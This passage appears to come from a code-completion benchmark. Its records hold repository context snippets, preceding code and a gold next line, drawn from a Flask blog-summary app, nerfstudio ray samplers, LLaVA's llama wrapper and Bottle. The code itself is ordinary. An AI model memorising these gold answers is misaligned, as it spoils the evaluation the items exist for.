for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver) | print_loaded_driver(loaded_driver) | 5 | 2023-10-31 22:38:36+00:00 | 4k |
7Wate/EndOfYear | main.py | [
{
"identifier": "const",
"path": "src/const.py",
"snippet": "SITE_NAME = \"EndOfYear\"\nSITE_SERVICE_WEB = 1\nSITE_SERVICE_STATIC = 0\nTIME_ZONE = \"Asia/Shanghai\"\nFORMAT_TIME = \"%Y-%m-%d %H:%M:%S\"\nBLOG_POST_CATEGORY_LIFE = 1\nBLOG_POST_CATEGORY_TECH = 2\nBLOG_MAX_KEYS = 7\nLUNAR_HOLIDAYS = {\n (1, 1): '春节',\n (1, 15): '元宵节',\n (2, 2): '龙抬头',\n (5, 5): '端午节',\n (7, 7): '七夕节',\n (7, 15): '中元节',\n (8, 15): '中秋节',\n (9, 9): '重阳节',\n (12, 8): '腊八节',\n (12, 23): '小年',\n (12, 30): '除夕'\n}\nSOLAR_HOLIDAYS = {\n (1, 1): '元旦',\n (2, 14): '情人节',\n (3, 8): '妇女节',\n (4, 4): '清明节',\n (5, 1): '劳动节',\n (10, 1): '国庆节',\n (12, 13): '南京大屠杀纪念日',\n (9, 18): '九一八事变纪念日',\n (12, 7): '南京保卫战胜利纪念日',\n (8, 15): '抗日战争胜利纪念日'\n}"
},
{
"identifier": "models",
"path": "src/models.py",
"snippet": "class Site:\nclass Blog:\nclass Post:\nclass Custom:\n def to_dict(self) -> dict:\n def to_dict(self) -> dict:\n def to_dict(self) -> dict:\n def to_dict(self) -> dict:"
},
{
"identifier": "tools",
"path": "src/tools.py",
"snippet": "def check_website_status(url):\ndef get_domain(url):\ndef get_domain_life(url):\ndef remove_html_tags(text):\ndef get_yiyan():\ndef get_multiple_of_100(string):\ndef format_datetime(dt_str):"
},
{
"identifier": "Config",
"path": "src/config.py",
"snippet": "class Config:\n def __init__(self, path):\n \"\"\"\n 初始化配置文件 config.ini\n :param path:文件路径\n \"\"\"\n if not os.path.isfile(path):\n logger.error(f\"配置文件 {path} 不存在或不是一个文件\")\n raise FileNotFoundError\n\n self.path = path\n self.config = configparser.ConfigParser()\n\n try:\n self.config.read(self.path)\n except configparser.ParsingError as e:\n logger.error(f\"解析配置文件 {self.path} 错误: {str(e)}\")\n raise\n\n except PermissionError as e:\n logger.error(f\"没有权限读取配置文件 {self.path}: {str(e)}\")\n raise\n\n @property\n def rss_url(self):\n try:\n url = self.config.get('blog', 'rss', fallback=None)\n except configparser.NoSectionError:\n logger.error('未找到 blog 配置项,请检查拼写')\n return None\n\n if not url:\n logger.debug('rss 文件配置值为空,尝试读取环境变量')\n url = os.environ.get('rss')\n if url is None:\n logger.error('rss 文件配置值为空,环境变量为空……')\n return None\n\n # 如果网址不可访问,返回 None\n if not check_website_status(url):\n logger.error(f\"rss URL {url} 不可访问\")\n return None\n\n return url\n\n @property\n def rss_domain(self):\n rss_url = self.rss_url\n\n if rss_url is None:\n return None\n\n parsed = urlparse(rss_url)\n domain_parts = parsed.netloc.split('.')\n\n if len(domain_parts) < 2:\n logger.error(f\"提供的 URL {rss_url} 的域名格式错误\")\n return None\n\n return '.'.join(domain_parts[-2:])\n\n @property\n def web_status(self):\n try:\n web_status = self.config.get('default', 'web', fallback=None)\n except configparser.NoSectionError:\n logger.error('未找到 web 配置项,请检查拼写')\n return None\n\n if web_status is None:\n logger.error('web 配置值为空')\n return const.SITE_SERVICE_WEB\n\n if web_status == \"True\" or web_status == \"true\" or web_status == \"t\" or web_status == \"T\":\n return const.SITE_SERVICE_WEB\n\n if web_status == \"False\" or web_status == \"false\" or web_status == \"f\" or web_status == \"F\":\n return const.SITE_SERVICE_STATIC"
},
{
"identifier": "Generator",
"path": "src/generator.py",
"snippet": "class Generator:\n\n def __init__(self, rss):\n \"\"\"\n 初始化Generator类\n :param rss: RSS链接\n \"\"\"\n try:\n self._my_blog = scraper.Blog(rss)\n logger.debug(self._my_blog)\n for i, post in enumerate(self._my_blog.post_lists, 1):\n logger.info(f\"Post #{i}:\")\n logger.info(post)\n except Exception as e:\n logger.error(f\"Generator 无法创建 Blog 对象: {str(e)}\")\n\n def blog(self):\n \"\"\"\n 获取博客信息\n :return: Blog字典\n \"\"\"\n return models.Blog(\n name=self._my_blog.title,\n link=self._my_blog.link,\n life=self._my_blog.life,\n article_count=self._my_blog.article_count,\n article_word_count=self._my_blog.article_word_count,\n top_post_keys=self._my_blog.keys,\n category=self._my_blog.category\n ).to_dict()\n\n def special_post(self):\n \"\"\"\n 获取特殊日期的文章\n :return: Post字典\n \"\"\"\n max_item_special_date = self._get_post_with_max(\"special_date_score\")\n return models.Post(\n title=max_item_special_date.title,\n content=max_item_special_date.content,\n keys=max_item_special_date.keys,\n time=max_item_special_date.time,\n date=max_item_special_date.date\n ).to_dict()\n\n def sentiment_post(self):\n \"\"\"\n 获取情感最优文章\n :return: Post字典\n \"\"\"\n max_item_sentiment = self._get_post_with_max(\"sentiment_score\")\n return models.Post(\n title=max_item_sentiment.title,\n content=max_item_sentiment.content,\n keys=max_item_sentiment.keys,\n time=max_item_sentiment.time,\n date=max_item_sentiment.date\n ).to_dict()\n\n def long_post(self):\n \"\"\"\n 获取最长文章数据\n :return: Post字典\n \"\"\"\n max_item_long = self._get_post_with_max(\"word_count\")\n return models.Post(\n title=max_item_long.title,\n content=max_item_long.content,\n keys=max_item_long.keys,\n time=max_item_long.time,\n date=max_item_long.date,\n ).to_dict()\n\n def short_post(self):\n \"\"\"\n 获取最短文章数据\n :return: Post字典\n \"\"\"\n max_item_short = self._get_post_with_min(\"word_count\")\n return models.Post(\n title=max_item_short.title,\n content=max_item_short.content,\n keys=max_item_short.keys,\n time=max_item_short.time,\n date=max_item_short.date,\n ).to_dict()\n\n def _get_post_with_max(self, score_attr):\n \"\"\"\n 获取具有最大属性值的文章\n :param score_attr: 属性\n :return:\n \"\"\"\n max_score = max(getattr(post, score_attr) for post in self._my_blog.post_lists)\n max_posts = [post for post in self._my_blog.post_lists if getattr(post, score_attr) == max_score]\n if max_posts:\n return max_posts[0]\n return None\n\n def _get_post_with_min(self, score_attr):\n \"\"\"\n 获取具有最小属性值的文章\n :param score_attr:\n :return:\n \"\"\"\n min_score = min(getattr(post, score_attr) for post in self._my_blog.post_lists)\n min_posts = [post for post in self._my_blog.post_lists if getattr(post, score_attr) == min_score]\n if min_posts:\n return min_posts[0]\n return None"
}
] | from flask import Flask, render_template, redirect, url_for
from loguru import logger
from src import const
from src import models
from src import tools
from src.config import Config
from src.generator import Generator | 2,249 |
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据
|
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据 | site = models.Site( | 1 | 2023-10-30 03:07:17+00:00 | 4k |
masked-spacetime-hashing/msth | nerfstudio/model_components/ray_samplers.py | [
{
"identifier": "Frustums",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class Frustums(TensorDataclass):\n \"\"\"Describes region of space as a frustum.\"\"\"\n\n origins: TensorType[\"bs\":..., 3]\n \"\"\"xyz coordinate for ray origin.\"\"\"\n directions: TensorType[\"bs\":..., 3]\n \"\"\"Direction of ray.\"\"\"\n starts: TensorType[\"bs\":..., 1]\n \"\"\"Where the frustum starts along a ray.\"\"\"\n ends: TensorType[\"bs\":..., 1]\n \"\"\"Where the frustum ends along a ray.\"\"\"\n pixel_area: TensorType[\"bs\":..., 1]\n \"\"\"Projected area of pixel a distance 1 away from origin.\"\"\"\n offsets: Optional[TensorType[\"bs\":..., 3]] = None\n \"\"\"Offsets for each sample position\"\"\"\n\n def get_positions(self) -> TensorType[..., 3]:\n \"\"\"Calculates \"center\" position of frustum. Not weighted by mass.\n\n Returns:\n xyz positions.\n \"\"\"\n pos = self.origins + self.directions * (self.starts + self.ends) / 2\n if self.offsets is not None:\n pos = pos + self.offsets\n return pos\n\n def set_offsets(self, offsets):\n \"\"\"Sets offsets for this frustum for computing positions\"\"\"\n self.offsets = offsets\n\n def get_gaussian_blob(self) -> Gaussians:\n \"\"\"Calculates guassian approximation of conical frustum.\n\n Returns:\n Conical frustums approximated by gaussian distribution.\n \"\"\"\n # Cone radius is set such that the square pixel_area matches the cone area.\n cone_radius = torch.sqrt(self.pixel_area) / 1.7724538509055159 # r = sqrt(pixel_area / pi)\n if self.offsets is not None:\n raise NotImplementedError()\n return conical_frustum_to_gaussian(\n origins=self.origins,\n directions=self.directions,\n starts=self.starts,\n ends=self.ends,\n radius=cone_radius,\n )\n\n @classmethod\n def get_mock_frustum(cls, device: Optional[TORCH_DEVICE] = \"cpu\") -> \"Frustums\":\n \"\"\"Helper function to generate a placeholder frustum.\n\n Returns:\n A size 1 frustum with meaningless values.\n \"\"\"\n return Frustums(\n origins=torch.ones((1, 3)).to(device),\n directions=torch.ones((1, 3)).to(device),\n starts=torch.ones((1, 1)).to(device),\n ends=torch.ones((1, 1)).to(device),\n pixel_area=torch.ones((1, 1)).to(device),\n )"
},
{
"identifier": "RayBundle",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class RayBundle(TensorDataclass):\n \"\"\"A bundle of ray parameters.\"\"\"\n\n # TODO(ethan): make sure the sizes with ... are correct\n origins: TensorType[..., 3]\n \"\"\"Ray origins (XYZ)\"\"\"\n directions: TensorType[..., 3]\n \"\"\"Unit ray direction vector\"\"\"\n pixel_area: TensorType[..., 1]\n \"\"\"Projected area of pixel a distance 1 away from origin\"\"\"\n camera_indices: Optional[TensorType[..., 1]] = None\n \"\"\"Camera indices\"\"\"\n nears: Optional[TensorType[..., 1]] = None\n \"\"\"Distance along ray to start sampling\"\"\"\n fars: Optional[TensorType[..., 1]] = None\n \"\"\"Rays Distance along ray to stop sampling\"\"\"\n metadata: Optional[Dict[str, TensorType[\"num_rays\", \"latent_dims\"]]] = None\n \"\"\"Additional metadata or data needed for interpolation, will mimic shape of rays\"\"\"\n times: Optional[TensorType[..., 1]] = None\n \"\"\"Times at which rays are sampled\"\"\"\n\n def set_camera_indices(self, camera_index: int) -> None:\n \"\"\"Sets all of the the camera indices to a specific camera index.\n\n Args:\n camera_index: Camera index.\n \"\"\"\n self.camera_indices = torch.ones_like(self.origins[..., 0:1]).long() * camera_index\n\n def __len__(self) -> int:\n num_rays = torch.numel(self.origins) // self.origins.shape[-1]\n return num_rays\n\n def sample(self, num_rays: int) -> \"RayBundle\":\n \"\"\"Returns a RayBundle as a subset of rays.\n\n Args:\n num_rays: Number of rays in output RayBundle\n\n Returns:\n RayBundle with subset of rays.\n \"\"\"\n assert num_rays <= len(self)\n indices = random.sample(range(len(self)), k=num_rays)\n return self[indices]\n\n def get_row_major_sliced_ray_bundle(self, start_idx: int, end_idx: int) -> \"RayBundle\":\n \"\"\"Flattens RayBundle and extracts chunk given start and end indices.\n\n Args:\n start_idx: Start index of RayBundle chunk.\n end_idx: End index of RayBundle chunk.\n\n Returns:\n Flattened RayBundle with end_idx-start_idx rays.\n\n \"\"\"\n return self.flatten()[start_idx:end_idx]\n\n def get_ray_samples(\n self,\n bin_starts: TensorType[\"bs\":..., \"num_samples\", 1],\n bin_ends: TensorType[\"bs\":..., \"num_samples\", 1],\n spacing_starts: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None,\n spacing_ends: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None,\n spacing_to_euclidean_fn: Optional[Callable] = None,\n ) -> RaySamples:\n \"\"\"Produces samples for each ray by projection points along the ray direction. 
Currently samples uniformly.\n\n Args:\n bin_starts: Distance from origin to start of bin.\n bin_ends: Distance from origin to end of bin.\n\n Returns:\n Samples projected along ray.\n \"\"\"\n deltas = bin_ends - bin_starts\n if self.camera_indices is not None:\n camera_indices = self.camera_indices[..., None]\n else:\n camera_indices = None\n\n shaped_raybundle_fields = self[..., None]\n\n frustums = Frustums(\n origins=shaped_raybundle_fields.origins, # [..., 1, 3]\n directions=shaped_raybundle_fields.directions, # [..., 1, 3]\n starts=bin_starts, # [..., num_samples, 1]\n ends=bin_ends, # [..., num_samples, 1]\n pixel_area=shaped_raybundle_fields.pixel_area, # [..., 1, 1]\n )\n\n ray_samples = RaySamples(\n frustums=frustums,\n camera_indices=camera_indices, # [..., 1, 1]\n deltas=deltas, # [..., num_samples, 1]\n spacing_starts=spacing_starts, # [..., num_samples, 1]\n spacing_ends=spacing_ends, # [..., num_samples, 1]\n spacing_to_euclidean_fn=spacing_to_euclidean_fn,\n metadata=shaped_raybundle_fields.metadata,\n times=None if self.times is None else self.times[..., None], # [..., 1, 1]\n )\n\n return ray_samples"
},
{
"identifier": "RaySamples",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class RaySamples(TensorDataclass):\n \"\"\"Samples along a ray\"\"\"\n\n frustums: Frustums\n \"\"\"Frustums along ray.\"\"\"\n camera_indices: Optional[TensorType[\"bs\":..., 1]] = None\n \"\"\"Camera index.\"\"\"\n deltas: Optional[TensorType[\"bs\":..., 1]] = None\n \"\"\"\"width\" of each sample.\"\"\"\n spacing_starts: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None\n \"\"\"Start of normalized bin edges along ray [0,1], before warping is applied, ie. linear in disparity sampling.\"\"\"\n spacing_ends: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None\n \"\"\"Start of normalized bin edges along ray [0,1], before warping is applied, ie. linear in disparity sampling.\"\"\"\n spacing_to_euclidean_fn: Optional[Callable] = None\n \"\"\"Function to convert bins to euclidean distance.\"\"\"\n metadata: Optional[Dict[str, TensorType[\"bs\":..., \"latent_dims\"]]] = None\n \"\"\"additional information relevant to generating ray samples\"\"\"\n\n times: Optional[TensorType[..., 1]] = None\n \"\"\"Times at which rays are sampled\"\"\"\n\n def get_transmittance(self, densities: TensorType[..., \"num_samples\", 1]) -> TensorType[..., \"num_samples\", 1]:\n \"\"\"Return weights based on predicted densities\n\n Args:\n densities: Predicted densities for samples along ray\n\n Returns:\n Weights for each sample\n \"\"\"\n\n delta_density = self.deltas * densities\n alphas = 1 - torch.exp(-delta_density)\n\n transmittance = torch.cumsum(delta_density[..., :-1, :], dim=-2)\n transmittance = torch.cat(\n [torch.zeros((*transmittance.shape[:1], 1, 1), device=densities.device), transmittance], dim=-2\n )\n transmittance = torch.exp(-transmittance) # [..., \"num_samples\"]\n transmittance = torch.nan_to_num(transmittance)\n\n return transmittance\n\n def get_weights(self, densities: TensorType[..., \"num_samples\", 1]) -> TensorType[..., \"num_samples\", 1]:\n \"\"\"Return weights based on predicted densities\n\n Args:\n densities: Predicted densities for samples along ray\n\n Returns:\n Weights for each sample\n \"\"\"\n\n delta_density = self.deltas * densities\n alphas = 1 - torch.exp(-delta_density)\n\n transmittance = torch.cumsum(delta_density[..., :-1, :], dim=-2)\n transmittance = torch.cat(\n [torch.zeros((*transmittance.shape[:1], 1, 1), device=densities.device), transmittance], dim=-2\n )\n transmittance = torch.exp(-transmittance) # [..., \"num_samples\"]\n\n weights = alphas * transmittance # [..., \"num_samples\"]\n weights = torch.nan_to_num(weights)\n\n return weights"
}
] | from abc import abstractmethod
from typing import Callable, List, Optional, Tuple
from nerfacc import OccupancyGrid
from torch import nn
from torchtyping import TensorType
from nerfstudio.cameras.rays import Frustums, RayBundle, RaySamples
import nerfacc
import torch | 2,751 | # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod
| # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod | def generate_ray_samples(self) -> RaySamples: | 2 | 2023-10-26 04:39:15+00:00 | 4k |
sehyunkwon/ICTC | step1/llava/model/language_model/llava_llama.py | [
{
"identifier": "LlavaMetaModel",
"path": "step1/llava/model/llava_arch.py",
"snippet": "class LlavaMetaModel:\n\n def __init__(self, config):\n super(LlavaMetaModel, self).__init__(config)\n\n if hasattr(config, \"mm_vision_tower\"):\n self.vision_tower = build_vision_tower(config, delay_load=True)\n self.mm_projector = nn.Linear(config.mm_hidden_size, config.hidden_size)\n\n def get_vision_tower(self):\n vision_tower = getattr(self, 'vision_tower', None)\n if type(vision_tower) is list:\n vision_tower = vision_tower[0]\n return vision_tower\n\n def initialize_vision_modules(self, model_args, fsdp=None):\n vision_tower = model_args.vision_tower\n mm_vision_select_layer = model_args.mm_vision_select_layer\n mm_vision_select_feature = model_args.mm_vision_select_feature\n pretrain_mm_mlp_adapter = model_args.pretrain_mm_mlp_adapter\n\n self.config.mm_vision_tower = vision_tower\n\n vision_tower = build_vision_tower(model_args)\n\n if fsdp is not None and len(fsdp) > 0:\n self.vision_tower = [vision_tower]\n else:\n self.vision_tower = vision_tower\n\n self.config.use_mm_proj = True\n self.config.mm_hidden_size = vision_tower.hidden_size\n self.config.mm_vision_select_layer = mm_vision_select_layer\n self.config.mm_vision_select_feature = mm_vision_select_feature\n\n if not hasattr(self, 'mm_projector'):\n self.mm_projector = nn.Linear(self.config.mm_hidden_size, self.config.hidden_size)\n\n if pretrain_mm_mlp_adapter is not None:\n mm_projector_weights = torch.load(pretrain_mm_mlp_adapter, map_location='cpu')\n def get_w(weights, keyword):\n return {k.split(keyword + '.')[1]: v for k, v in weights.items() if keyword in k}\n\n self.mm_projector.load_state_dict(get_w(mm_projector_weights, 'mm_projector'))"
},
{
"identifier": "LlavaMetaForCausalLM",
"path": "step1/llava/model/llava_arch.py",
"snippet": "class LlavaMetaForCausalLM(ABC):\n\n @abstractmethod\n def get_model(self):\n pass\n\n def get_vision_tower(self):\n return self.get_model().get_vision_tower()\n\n def encode_images(self, images):\n image_features = self.get_model().get_vision_tower()(images)\n image_features = self.get_model().mm_projector(image_features)\n return image_features\n\n def prepare_inputs_labels_for_multimodal(\n self, input_ids, attention_mask, past_key_values, labels, images\n ):\n vision_tower = self.get_vision_tower()\n if vision_tower is None or images is None or input_ids.shape[1] == 1:\n if past_key_values is not None and vision_tower is not None and images is not None and input_ids.shape[1] == 1:\n attention_mask = torch.ones((attention_mask.shape[0], past_key_values[-1][-1].shape[-2] + 1), dtype=attention_mask.dtype, device=attention_mask.device)\n return input_ids, attention_mask, past_key_values, None, labels\n\n if type(images) is list or images.ndim == 5:\n concat_images = torch.cat([image for image in images], dim=0)\n image_features = self.encode_images(concat_images)\n split_sizes = [image.shape[0] for image in images]\n image_features = torch.split(image_features, split_sizes, dim=0)\n image_features = [x.flatten(0, 1) for x in image_features]\n else:\n image_features = self.encode_images(images)\n\n new_input_embeds = []\n new_labels = [] if labels is not None else None\n cur_image_idx = 0\n for batch_idx, cur_input_ids in enumerate(input_ids):\n if (cur_input_ids == IMAGE_TOKEN_INDEX).sum() == 0:\n # multimodal LLM, but the current sample is not multimodal\n cur_input_embeds = self.get_model().embed_tokens(cur_input_ids)\n cur_input_embeds = cur_input_embeds + (0. * self.get_model().mm_projector(vision_tower.dummy_feature)).sum()\n new_input_embeds.append(cur_input_embeds)\n if labels is not None:\n new_labels.append(labels[batch_idx])\n cur_image_idx += 1\n continue\n image_token_indices = torch.where(cur_input_ids == IMAGE_TOKEN_INDEX)[0]\n cur_new_input_embeds = []\n if labels is not None:\n cur_labels = labels[batch_idx]\n cur_new_labels = []\n assert cur_labels.shape == cur_input_ids.shape\n while image_token_indices.numel() > 0:\n cur_image_features = image_features[cur_image_idx]\n image_token_start = image_token_indices[0]\n if getattr(self.config, 'tune_mm_mlp_adapter', False) and getattr(self.config, 'mm_use_im_start_end', False):\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[:image_token_start-1]).detach())\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[image_token_start-1:image_token_start]))\n cur_new_input_embeds.append(cur_image_features)\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[image_token_start+1:image_token_start+2]))\n if labels is not None:\n cur_new_labels.append(cur_labels[:image_token_start])\n cur_new_labels.append(torch.full((cur_image_features.shape[0],), IGNORE_INDEX, device=labels.device, dtype=labels.dtype))\n cur_new_labels.append(cur_labels[image_token_start:image_token_start+1])\n cur_labels = cur_labels[image_token_start+2:]\n else:\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[:image_token_start]))\n cur_new_input_embeds.append(cur_image_features)\n if labels is not None:\n cur_new_labels.append(cur_labels[:image_token_start])\n cur_new_labels.append(torch.full((cur_image_features.shape[0],), IGNORE_INDEX, device=labels.device, dtype=labels.dtype))\n cur_labels = cur_labels[image_token_start+1:]\n cur_image_idx += 1\n if 
getattr(self.config, 'tune_mm_mlp_adapter', False) and getattr(self.config, 'mm_use_im_start_end', False):\n cur_input_ids = cur_input_ids[image_token_start+2:]\n else:\n cur_input_ids = cur_input_ids[image_token_start+1:]\n image_token_indices = torch.where(cur_input_ids == IMAGE_TOKEN_INDEX)[0]\n if cur_input_ids.numel() > 0:\n if getattr(self.config, 'tune_mm_mlp_adapter', False) and getattr(self.config, 'mm_use_im_start_end', False):\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids).detach())\n else:\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids))\n if labels is not None:\n cur_new_labels.append(cur_labels)\n cur_new_input_embeds = [x.to(device=self.device) for x in cur_new_input_embeds]\n cur_new_input_embeds = torch.cat(cur_new_input_embeds, dim=0)\n new_input_embeds.append(cur_new_input_embeds)\n if labels is not None:\n cur_new_labels = torch.cat(cur_new_labels, dim=0)\n new_labels.append(cur_new_labels)\n\n if any(x.shape != new_input_embeds[0].shape for x in new_input_embeds):\n max_len = max(x.shape[0] for x in new_input_embeds)\n\n new_input_embeds_align = []\n for cur_new_embed in new_input_embeds:\n cur_new_embed = torch.cat((cur_new_embed, torch.zeros((max_len - cur_new_embed.shape[0], cur_new_embed.shape[1]), dtype=cur_new_embed.dtype, device=cur_new_embed.device)), dim=0)\n new_input_embeds_align.append(cur_new_embed)\n new_input_embeds = torch.stack(new_input_embeds_align, dim=0)\n\n if labels is not None:\n new_labels_align = []\n _new_labels = new_labels\n for cur_new_label in new_labels:\n cur_new_label = torch.cat((cur_new_label, torch.full((max_len - cur_new_label.shape[0],), IGNORE_INDEX, dtype=cur_new_label.dtype, device=cur_new_label.device)), dim=0)\n new_labels_align.append(cur_new_label)\n new_labels = torch.stack(new_labels_align, dim=0)\n\n if attention_mask is not None:\n new_attention_mask = []\n for cur_attention_mask, cur_new_labels, cur_new_labels_align in zip(attention_mask, _new_labels, new_labels):\n new_attn_mask_pad_left = torch.full((cur_new_labels.shape[0] - labels.shape[1],), True, dtype=attention_mask.dtype, device=attention_mask.device)\n new_attn_mask_pad_right = torch.full((cur_new_labels_align.shape[0] - cur_new_labels.shape[0],), False, dtype=attention_mask.dtype, device=attention_mask.device)\n cur_new_attention_mask = torch.cat((new_attn_mask_pad_left, cur_attention_mask, new_attn_mask_pad_right), dim=0)\n new_attention_mask.append(cur_new_attention_mask)\n attention_mask = torch.stack(new_attention_mask, dim=0)\n assert attention_mask.shape == new_labels.shape\n else:\n new_input_embeds = torch.stack(new_input_embeds, dim=0)\n if labels is not None:\n new_labels = torch.stack(new_labels, dim=0)\n\n if attention_mask is not None:\n new_attn_mask_pad_left = torch.full((attention_mask.shape[0], new_input_embeds.shape[1] - input_ids.shape[1]), True, dtype=attention_mask.dtype, device=attention_mask.device)\n attention_mask = torch.cat((new_attn_mask_pad_left, attention_mask), dim=1)\n assert attention_mask.shape == new_input_embeds.shape[:2]\n\n return None, attention_mask, past_key_values, new_input_embeds, new_labels\n\n def initialize_vision_tokenizer(self, model_args, tokenizer):\n if model_args.mm_use_im_patch_token:\n tokenizer.add_tokens([DEFAULT_IMAGE_PATCH_TOKEN], special_tokens=True)\n self.resize_token_embeddings(len(tokenizer))\n\n if model_args.mm_use_im_start_end:\n num_new_tokens = tokenizer.add_tokens([DEFAULT_IM_START_TOKEN, DEFAULT_IM_END_TOKEN], special_tokens=True)\n 
self.resize_token_embeddings(len(tokenizer))\n\n if num_new_tokens > 0:\n input_embeddings = self.get_input_embeddings().weight.data\n output_embeddings = self.get_output_embeddings().weight.data\n\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(\n dim=0, keepdim=True)\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(\n dim=0, keepdim=True)\n\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\n\n if model_args.tune_mm_mlp_adapter:\n for p in self.get_input_embeddings().parameters():\n p.requires_grad = True\n for p in self.get_output_embeddings().parameters():\n p.requires_grad = False\n\n if model_args.pretrain_mm_mlp_adapter:\n mm_projector_weights = torch.load(model_args.pretrain_mm_mlp_adapter, map_location='cpu')\n embed_tokens_weight = mm_projector_weights['model.embed_tokens.weight']\n assert num_new_tokens == 2\n if input_embeddings.shape == embed_tokens_weight.shape:\n input_embeddings[-num_new_tokens:] = embed_tokens_weight[-num_new_tokens:]\n elif embed_tokens_weight.shape[0] == num_new_tokens:\n input_embeddings[-num_new_tokens:] = embed_tokens_weight\n else:\n raise ValueError(f\"Unexpected embed_tokens_weight shape. Pretrained: {embed_tokens_weight.shape}. Current: {input_embeddings.shape}. Numer of new tokens: {num_new_tokens}.\")\n elif model_args.mm_use_im_patch_token:\n if model_args.tune_mm_mlp_adapter:\n for p in self.get_input_embeddings().parameters():\n p.requires_grad = False\n for p in self.get_output_embeddings().parameters():\n p.requires_grad = False"
}
] | from typing import List, Optional, Tuple, Union
from torch.nn import CrossEntropyLoss
from transformers import AutoConfig, AutoModelForCausalLM, \
LlamaConfig, LlamaModel, LlamaForCausalLM
from transformers.modeling_outputs import CausalLMOutputWithPast
from ..llava_arch import LlavaMetaModel, LlavaMetaForCausalLM
import torch
import torch.nn as nn | 3,209 | # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
    model_type = "llava"


class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
    config_class = LlavaConfig

    def __init__(self, config: LlamaConfig):
        super(LlavaLlamaModel, self).__init__(config)
| # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
    model_type = "llava"


class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
    config_class = LlavaConfig

    def __init__(self, config: LlamaConfig):
        super(LlavaLlamaModel, self).__init__(config)
| class LlavaLlamaForCausalLM(LlamaForCausalLM, LlavaMetaForCausalLM): | 1 | 2023-10-27 05:00:14+00:00 | 4k |
jgujerry/pythonframeworks | frameworks.py | [
{
"identifier": "route",
"path": "bottle.py",
"snippet": "def route(self, path=None, method='GET', callback=None, name=None,\n apply=None, skip=None, **config):\n \"\"\" A decorator to bind a function to a request URL. Example::\n\n @app.route('/hello/:name')\n def hello(name):\n return 'Hello %s' % name\n\n The ``:name`` part is a wildcard. See :class:`Router` for syntax\n details.\n\n :param path: Request path or a list of paths to listen to. If no\n path is specified, it is automatically generated from the\n signature of the function.\n :param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of\n methods to listen to. (default: `GET`)\n :param callback: An optional shortcut to avoid the decorator\n syntax. ``route(..., callback=func)`` equals ``route(...)(func)``\n :param name: The name for this route. (default: None)\n :param apply: A decorator or plugin or a list of plugins. These are\n applied to the route callback in addition to installed plugins.\n :param skip: A list of plugins, plugin classes or names. Matching\n plugins are not installed to this route. ``True`` skips all.\n\n Any additional keyword arguments are stored as route-specific\n configuration and passed to plugins (see :meth:`Plugin.apply`).\n \"\"\"\n if callable(path): path, callback = None, path\n plugins = makelist(apply)\n skiplist = makelist(skip)\n def decorator(callback):\n # TODO: Documentation and tests\n if isinstance(callback, basestring): callback = load(callback)\n for rule in makelist(path) or 